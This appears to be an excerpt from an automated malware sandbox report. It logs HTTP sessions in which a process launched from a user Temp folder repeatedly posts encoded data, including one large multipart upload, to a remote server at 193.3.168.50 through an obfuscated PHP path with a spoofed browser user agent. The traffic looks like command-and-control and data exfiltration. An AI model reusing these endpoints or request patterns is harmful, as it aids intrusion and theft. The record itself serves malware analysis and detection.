                                                                                                                  Dec 5, 2024 10:53:17.949829102 CET350INData Raw: 6c 53 5f 63 60 00 4c 51 4f 7c 42 70 5a 54 54 56 06 72 40 5c 65 55 42 51 5e 08 5d 52 01 6e 4d 5d 7e 78 06 63 04 09 5e 68 60 7a 0f 7f 5e 6f 6c 7a 5e 45 59 62 04 6e 40 5a 72 40 01 6b 07 5f 44 68 0a 7b 4f 54 64 07 03 5b 5b 5e 7f 6c 61 09 5c 7a 5e 57
                                                                                                                  Data Ascii: lS_c`LQO|BpZTTVr@\eUBQ^]RnM]~xc^h`z^olz^EYbn@Zr@k_Dh{OTd[[^la\z^WZ`dDRto^|nng]VN~E{Y]_Tw@WaRGZYZQSdTP[f}ZkZ|R^Xm_rPxv~^ioAW}e_Y`UaC]r[Lkcm[~AbbpxSCZVkZxrGl`|BlvZ~zsWcdAR~aVRn^W~qQnbhsdQ}Qp}w~g~N|PEZ
                                                                                                                  Dec 5, 2024 10:53:17.981781960 CET416OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 384
                                                                                                                  Expect: 100-continue
                                                                                                                  Dec 5, 2024 10:53:18.336882114 CET384OUTData Raw: 5a 5a 5a 58 5c 5d 5f 55 5a 58 51 52 55 53 5a 52 50 52 5d 58 59 52 57 47 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: ZZZX\]_UZXQRUSZRPR]XYRWG^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\./ <;4&&[/%[7S:33X'/,U T!%=350>#G $],5
                                                                                                                  Dec 5, 2024 10:53:18.384511948 CET25INHTTP/1.1 100 Continue
                                                                                                                  Dec 5, 2024 10:53:18.734464884 CET349INHTTP/1.1 200 OK
                                                                                                                  Server: nginx
                                                                                                                  Date: Thu, 05 Dec 2024 09:53:18 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Data Raw: 39 38 0d 0a 09 11 25 10 30 28 3c 1e 33 02 06 0a 3f 0a 2f 02 2e 55 2b 58 33 58 2d 09 26 39 34 0f 3e 5c 2c 02 36 04 3a 1e 28 00 2f 57 3f 27 24 1b 3d 28 20 58 00 1a 25 01 23 0b 2f 04 2e 39 28 10 24 3d 2d 07 24 2d 22 05 2a 2a 37 57 3e 20 20 55 26 2e 07 08 3e 0d 08 0a 2f 1d 25 16 3a 00 32 58 31 3f 2a 52 0e 17 22 0b 3d 07 38 5b 22 21 21 54 29 21 23 59 29 3f 20 0c 27 28 3e 19 34 07 25 53 25 33 25 52 27 31 2e 55 24 01 2b 5b 25 01 02 5c 29 13 20 5f 2e 05 20 57 00 31 57 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98%0(<3?/.U+X3X-&94>\,6:(/W?'$=( X%#/.9($=-$-"**7W> U&.>/%:2X1?*R"=8["!!T)!#Y)? '(>4%S%3%R'1.U$+[%\) _. W1WT0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  1192.168.2.449740193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:53:20.104814053 CET417OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1060
                                                                                                                  Expect: 100-continue
                                                                                                                  Dec 5, 2024 10:53:20.460542917 CET1060OUTData Raw: 5f 58 5a 5f 5c 59 5f 52 5a 58 51 52 55 5e 5a 5c 50 55 5d 52 59 5f 57 48 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: _XZ_\Y_RZXQRU^Z\PU]RY_WH^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\.^;)]?:(Z ,?%Z4S.#7'?<S4.$>,D6 *#G $],
                                                                                                                  Dec 5, 2024 10:53:21.336755037 CET25INHTTP/1.1 100 Continue
                                                                                                                  Dec 5, 2024 10:53:21.569391966 CET200INHTTP/1.1 200 OK
                                                                                                                  Server: nginx
                                                                                                                  Date: Thu, 05 Dec 2024 09:53:21 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 4;Y\W0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  2192.168.2.449741193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:53:20.595257044 CET441OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1936
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Dec 5, 2024 10:53:20.940305948 CET1936OUTData Raw: 5a 59 5a 5f 5c 5d 5a 52 5a 58 51 52 55 5e 5a 5c 50 51 5d 58 59 5f 57 44 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: ZYZ_\]ZRZXQRU^Z\PQ]XY_WD^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\.^/]+;4",<7:04%<42='./6 ?==#G $],
                                                                                                                  Dec 5, 2024 10:53:21.829662085 CET25INHTTP/1.1 100 Continue
                                                                                                                  Dec 5, 2024 10:53:22.061327934 CET349INHTTP/1.1 200 OK
                                                                                                                  Server: nginx
                                                                                                                  Date: Thu, 05 Dec 2024 09:53:21 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Data Raw: 39 38 0d 0a 09 11 26 00 30 28 38 56 26 3c 23 53 28 20 20 1c 2d 33 02 06 25 3e 2a 1c 26 5c 34 0e 3e 5c 3f 5a 20 3e 25 03 3c 3a 2f 1f 2b 09 30 1b 3d 28 20 58 00 1a 26 5f 21 32 0e 13 2d 29 20 5b 26 13 29 06 27 2d 07 14 2a 2a 2f 50 3f 33 2b 0d 32 00 03 0f 2a 23 0f 52 2c 37 3d 5e 3a 3e 00 58 25 05 2a 52 0e 17 21 56 29 3e 09 00 23 1f 2d 57 3d 0f 2f 59 3c 2f 2b 55 24 38 3a 16 22 3e 35 52 24 1e 3e 0f 27 21 3e 1d 30 06 3c 01 25 3f 2c 11 3e 03 20 5f 2e 05 20 57 00 31 57 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98&0(8V&<#S( -3%>*&\4>\?Z >%<:/+0=( X&_!2-) [&)'-**/P?3+2*#R,7=^:>X%*R!V)>#-W=/Y</+U$8:">5R$>'!>0<%?,> _. W1WT0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  3192.168.2.449744193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:53:22.006339073 CET417OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1060
                                                                                                                  Expect: 100-continue
                                                                                                                  Dec 5, 2024 10:53:22.378456116 CET1060OUTData Raw: 5a 5c 5f 53 59 5b 5a 5f 5a 58 51 52 55 51 5a 53 50 55 5d 52 59 59 57 46 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: Z\_SY[Z_ZXQRUQZSPU]RYYWF^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\.,9^=*84%*_/4*<U:#]3<8S $8B! #==#G $],=
                                                                                                                  Dec 5, 2024 10:53:23.233376026 CET25INHTTP/1.1 100 Continue
                                                                                                                  Dec 5, 2024 10:53:23.465343952 CET200INHTTP/1.1 200 OK
                                                                                                                  Server: nginx
                                                                                                                  Date: Thu, 05 Dec 2024 09:53:23 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 4;Y\W0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  4192.168.2.449745193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:53:23.734152079 CET441OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1060
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Dec 5, 2024 10:53:24.080730915 CET1060OUTData Raw: 5a 5c 5a 5f 59 56 5a 55 5a 58 51 52 55 55 5a 5f 50 50 5d 5d 59 5c 57 40 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: Z\Z_YVZUZXQRUUZ_PP]]Y\W@^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\-80+$#68Z2 :#.0$3</!"Y3;53$V>=#G $],-


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  5192.168.2.449746193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:53:24.289794922 CET487OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: multipart/form-data; boundary=----vb00ndIHgHvNoJ7fSqVxvDUiUocs3TKQON
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 114202
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Dec 5, 2024 10:53:24.649388075 CET12360OUTData Raw: 2d 2d 2d 2d 2d 2d 76 62 30 30 6e 64 49 48 67 48 76 4e 6f 4a 37 66 53 71 56 78 76 44 55 69 55 6f 63 73 33 54 4b 51 4f 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 30 22
                                                                                                                  Data Ascii: ------vb00ndIHgHvNoJ7fSqVxvDUiUocs3TKQONContent-Disposition: form-data; name="0"Content-Type: text/plainZ]Z^\Z_TZXQRUWZYP^]RY\W@^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQ
                                                                                                                  Dec 5, 2024 10:53:24.769570112 CET7416OUTData Raw: 4b 77 46 52 69 45 4d 7a 51 6b 5a 39 47 64 50 62 2b 37 56 74 77 59 35 35 61 2b 54 46 44 56 72 53 56 59 6c 49 77 5a 53 4e 34 64 41 31 46 4b 51 4b 70 45 6f 4e 47 78 6f 51 64 6e 66 42 57 4a 34 32 43 4a 42 56 31 49 36 53 63 67 61 37 71 6d 2b 66 76 41
                                                                                                                  Data Ascii: KwFRiEMzQkZ9GdPb+7VtwY55a+TFDVrSVYlIwZSN4dA1FKQKpEoNGxoQdnfBWJ42CJBV1I6Scga7qm+fvAVe9lBdhBsiTHhGYYFYfwIcvk1YMVTB+uTa++du9VpBf8UvgMQhYllDcTpuMhl4HHIBozEzCTK0NkgI4nYfbcidpEZXk8xdfAbjY8KyXlwAOHLVIlUXr0OsAHOBDOKxt54W0gitLmbFwNef05zeCmG1C0QDqof9bfz
                                                                                                                  Dec 5, 2024 10:53:24.769634962 CET2472OUTData Raw: 7a 30 66 62 4b 67 4c 65 7a 30 66 72 2f 35 68 7a 63 55 62 6e 71 4d 7a 4e 34 62 56 4c 49 6a 72 73 33 79 62 34 4c 44 62 76 44 5a 76 32 36 6f 4e 57 50 41 6f 66 32 69 76 78 38 2b 39 75 49 38 6c 4d 63 50 30 64 34 6e 2b 66 63 57 6c 36 6e 6e 2b 61 42 4b
                                                                                                                  Data Ascii: z0fbKgLez0fr/5hzcUbnqMzN4bVLIjrs3yb4LDbvDZv26oNWPAof2ivx8+9uI8lMcP0d4n+fcWl6nn+aBKHV3fvK/g4K4BKoUlNwSp20flq6kMrsPd/Fp/81/ZzyUx6+wCFOWHO+vxg43UrmATEeX9lWQ+d9yZc3bHPKXOCjox333l/uEpLNpQNk/hiVeiXDJC85F83NsmL8+Go9P4YPLggLVEow8vkpyP98/MqI8wTaY29wy6s
                                                                                                                  Dec 5, 2024 10:53:24.769876957 CET4944OUTData Raw: 5a 54 31 47 4e 37 34 32 37 64 4c 7a 44 52 36 34 76 36 33 51 2b 6c 72 42 43 45 2f 55 46 72 49 73 2f 68 32 73 77 5a 33 74 6f 33 79 36 64 71 54 6c 74 35 66 4a 36 4f 4c 51 37 6c 31 39 6f 58 43 31 51 76 6d 4a 53 4c 78 56 6f 72 45 37 49 71 44 32 77 33
                                                                                                                  Data Ascii: ZT1GN7427dLzDR64v63Q+lrBCE/UFrIs/h2swZ3to3y6dqTlt5fJ6OLQ7l19oXC1QvmJSLxVorE7IqD2w37gSrdofmFBxpnlq5i6jJ8tH2KKLrl1IbetrzOtizTZdyx9vNRx5KuWkm9W+LamNl3vomNTk/yDb1eHYJtinst2Dc5adGd3rOpX7Iz2PTtMrppljo7JNxCGE5euBko+5oAkvB5rpf3n756HyNgcHYMpR0eShdRK+cX
                                                                                                                  Dec 5, 2024 10:53:24.769970894 CET4944OUTData Raw: 2b 4e 49 66 6b 6c 51 43 52 30 4c 41 4b 4e 77 64 62 43 5a 6d 55 62 6e 46 6e 32 48 72 71 67 37 76 43 77 75 69 6a 39 72 52 77 6a 47 48 73 43 6a 4d 64 42 51 53 62 32 43 42 69 37 59 32 4d 51 6e 42 6d 4f 41 50 31 4f 4c 70 34 2b 2b 52 79 73 7a 32 36 4f
                                                                                                                  Data Ascii: +NIfklQCR0LAKNwdbCZmUbnFn2Hrqg7vCwuij9rRwjGHsCjMdBQSb2CBi7Y2MQnBmOAP1OLp4++Rysz26OaLOGYS8ghWooHCYXm/u66afvr+vyEKFMpqDhalVM5+ek0pqvBSKkgzr9wBelGBvY/Dou+Va+6Nl0sjIGbtfex9ahIQ+653hjVWh0/5FK7rk33Uy5g2lMV41LOitpdxcTerTIgRRAX/iYvg1LctSr1BAIYMP8u0enH
                                                                                                                  Dec 5, 2024 10:53:24.770133018 CET4944OUTData Raw: 31 53 6d 75 74 43 57 6d 72 35 6b 37 4c 79 45 53 6f 41 59 53 43 64 64 74 57 52 71 48 41 36 32 6a 6f 2f 54 6f 4a 4f 6b 2f 6e 41 48 42 46 4c 6d 69 66 6e 58 4e 48 64 37 43 6c 6f 31 66 30 55 31 6a 31 38 49 77 2f 4c 57 2f 6a 4e 64 72 56 70 56 71 49 30
                                                                                                                  Data Ascii: 1SmutCWmr5k7LyESoAYSCddtWRqHA62jo/ToJOk/nAHBFLmifnXNHd7Clo1f0U1j18Iw/LW/jNdrVpVqI0a+9h0lc70yVqErzwi7Df4gOEdjkN7Blfu3qnv3E4pB1vCSW6flwqzLPMOdB+/y7xp9WZu3N5TpVNWRbtlevnQjeVrqQ7DsLE30G+KYOV0lhesGUWqdK8jyLIfgRYjh3Au7lO5nAlxfnnom8MRIXXsZpkry4BHxz8k
                                                                                                                  Dec 5, 2024 10:53:24.889765024 CET2472OUTData Raw: 72 36 6c 63 70 2f 68 58 46 4c 39 44 38 55 2b 4c 5a 2f 58 76 6f 4c 43 45 4a 48 49 6b 50 70 52 6b 45 52 79 66 6d 69 55 78 2f 35 62 59 30 6a 68 39 66 4b 30 46 55 46 4a 7a 4d 44 6d 48 65 66 69 47 56 6e 7a 30 79 34 48 67 64 77 65 68 30 43 30 74 31 62
                                                                                                                  Data Ascii: r6lcp/hXFL9D8U+LZ/XvoLCEJHIkPpRkERyfmiUx/5bY0jh9fK0FUFJzMDmHefiGVnz0y4Hgdweh0C0t1b+AJIBFvMnTxUwkbtXGC2KJvPHW4i2MuFldiUd4+A+fhM5iyiGCwpYgKi0SySJnwADeREF7Bn3L/W+QgglEXQXgjBDfg2nfuXNcab0GtYnSFx2+bseVd/0YY5ihK/XtqFezZcyYQ9MbrF0U6Qc57JtnTY8P3l8y+CJ
                                                                                                                  Dec 5, 2024 10:53:24.889789104 CET2472OUTData Raw: 6c 79 38 7a 73 36 4b 69 4f 45 78 6d 46 51 6b 4e 31 36 67 75 53 4c 34 31 57 6c 30 36 38 48 64 34 63 44 46 41 4b 4a 43 33 57 54 65 46 67 61 2b 64 78 33 38 78 32 64 2f 55 66 79 53 2f 76 78 68 56 66 67 61 30 76 38 4b 71 6e 67 47 72 6a 74 63 65 39 74
                                                                                                                  Data Ascii: ly8zs6KiOExmFQkN16guSL41Wl068Hd4cDFAKJC3WTeFga+dx38x2d/UfyS/vxhVfga0v8KqngGrjtce9tMU+yWyG8eX33nv7bSo0eUi5yiP3N2skqckhw33hKKXJ+a7RRjez0Dun6bCx/xu9+CZjGCv7G9Cbmgde+1L6hWodvh3/ajoUaJ8LGmlZjhXDPmwv1ZNgQbLhlgtmjLA1ULXMaTgNYpNyCTwfbrW96oElkvL3+mHYZq
                                                                                                                  Dec 5, 2024 10:53:24.889816999 CET4944OUTData Raw: 52 74 72 70 75 39 4e 49 6c 57 31 52 56 46 43 66 75 55 39 31 38 6d 76 4f 4f 32 58 31 6a 39 41 4a 34 72 46 6c 44 65 59 4b 6c 42 4e 7a 76 34 63 65 52 70 66 70 36 47 4b 45 4f 78 4b 38 39 51 41 68 56 47 71 68 6d 75 51 52 56 43 38 41 62 76 31 4d 72 6e
                                                                                                                  Data Ascii: Rtrpu9NIlW1RVFCfuU918mvOO2X1j9AJ4rFlDeYKlBNzv4ceRpfp6GKEOxK89QAhVGqhmuQRVC8Abv1Mrn8hpefeL/pmYmD75xQSFXUXJUjv4ndh4gYlKH5DjGXow52ytfZRxrdOQ1VvWlxEUEdQ8+8J8Xbl/gUa+yKtrGlmyKXUTyhlQPWBG40yh43M+x8BUIVu9BkA+4VsOvXTOGEeqUj8WQb3tnaHxGi9KSpE9yYvS/GMJJl
                                                                                                                  Dec 5, 2024 10:53:24.889844894 CET2472OUTData Raw: 31 6a 38 49 4d 7a 79 37 4e 35 78 50 37 45 4d 6d 73 39 36 53 74 75 69 4f 44 68 2b 6f 54 56 6b 64 4e 7a 6c 67 66 68 52 47 32 51 71 61 43 51 2b 2b 6e 34 4b 70 62 79 4f 77 64 62 77 69 42 2f 65 46 51 33 4a 53 65 69 50 41 6c 54 4e 62 2b 58 61 63 70 5a
                                                                                                                  Data Ascii: 1j8IMzy7N5xP7EMms96StuiODh+oTVkdNzlgfhRG2QqaCQ++n4KpbyOwdbwiB/eFQ3JSeiPAlTNb+XacpZ586IsLFXMav++DeAOOejT9etVEw0JW9rLXNP2wou+aOVM3Zu6Lub9VOQOeI7hMGN4XsT7MPfXg+DkYnXQGVHf/Phy9vZXp4EMGK39rIm14Wq0Hz4vkDtOOd2/kWkkJvL5fdPuqqcnB7e+ui5cFOgP81m4O3kx5vRN
                                                                                                                  Dec 5, 2024 10:53:25.508181095 CET25INHTTP/1.1 100 Continue
                                                                                                                  Dec 5, 2024 10:53:26.074276924 CET200INHTTP/1.1 200 OK
                                                                                                                  Server: nginx
                                                                                                                  Date: Thu, 05 Dec 2024 09:53:25 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 4;Y\W0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  6192.168.2.449748193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:53:25.261147976 CET441OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1060
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Dec 5, 2024 10:53:25.611988068 CET1060OUTData Raw: 5f 5c 5f 5a 59 56 5a 5f 5a 58 51 52 55 54 5a 52 50 5f 5d 5d 59 5d 57 46 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: _\_ZYVZ_ZXQRUTZRP_]]Y]WF^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\-;35_<?#)/<&#_(R,0;$/84"%-/5V7(=#G $],)
                                                                                                                  Dec 5, 2024 10:53:26.499133110 CET25INHTTP/1.1 100 Continue
                                                                                                                  Dec 5, 2024 10:53:26.733485937 CET200INHTTP/1.1 200 OK
                                                                                                                  Server: nginx
                                                                                                                  Date: Thu, 05 Dec 2024 09:53:26 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 4;Y\W0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  7192.168.2.449750193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:53:26.981178999 CET417OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1060
                                                                                                                  Expect: 100-continue


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  8192.168.2.449751193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:53:27.201997995 CET441OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1936
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Dec 5, 2024 10:53:27.549489975 CET1936OUTData Raw: 5f 58 5f 5e 59 57 5f 53 5a 58 51 52 55 5e 5a 5f 50 51 5d 5d 59 5e 57 46 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
